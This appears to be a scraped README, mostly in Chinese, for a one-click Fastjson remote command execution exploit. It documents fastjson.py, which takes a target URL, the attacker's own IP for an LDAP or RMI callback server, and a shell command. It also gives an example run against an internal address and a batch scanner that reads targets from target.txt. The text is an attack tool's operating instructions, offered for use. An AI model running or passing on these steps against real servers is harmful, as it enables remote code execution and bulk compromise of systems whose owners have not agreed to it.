Awesome

fastjson_rec_exploit

fastjson一键命令执行

脚本使用：

usage: Fastjson one-key command is executed! [-h] [-u URL] [-s SELF] [-c COMMAMD]

python3 fastjson.py -u [Target Url] -s [self IP] -c [command]

optional arguments:

-h, --help show this help message and exit

-u URL, --url URL 漏洞url

-s SELF, --self SELF 自己IP，如果是VPS请输入公网IP

-c COMMAMD, --commamd COMMAMD 执行的命令,有空格请加上双引号

-m [MODE], --mode [MODE] 选择执行模式(可选)，1：ldap模式(默认)；2：rmi模式

python3 fastjson.py -u http://192.168.1.3/ -s 192.168.1.1 -c "touch /tmp/test.txt

使用截图：

批量检测链接放target.txt中。 usage:python3 fastjson_check.py